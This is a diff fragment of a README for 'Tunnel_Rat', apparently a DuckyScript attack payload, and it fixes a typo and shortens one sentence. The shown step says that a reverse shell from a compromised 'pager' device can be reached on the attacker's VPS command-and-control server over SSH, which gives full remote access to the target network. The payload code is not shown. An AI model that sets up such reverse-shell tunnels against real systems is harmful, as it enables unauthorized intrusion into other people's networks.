OSINTI4L/DuckyScript-Payloads/Payloads/Tunnel_Rat/README.md

 <img width="772" height="50" alt="hook2" src="https://github.com/user-attachments/assets/fefd4c95-fccf-45d4-be3c-0011599dd34a" />

-**14)** A pager reverse shell is then avilable inside of the VPS C2 at: `ssh -p 2222 root@127.0.0.1`
+**14)** A pager reverse shell is then available inside of the VPS C2 at: `ssh -p 2222 root@127.0.0.1`

-**The attacker now has full remote access to the pager via a reverse shell `SSH` tunnel, allowing further exploitation of the target network.**
+**The attacker now has full remote access to the pager allowing further exploitation of the target network.**

 <img width="450" height="465" alt="kali" src="https://github.com/user-attachments/assets/00a2e1da-fb47-471e-b4e3-04e447bb9a93" />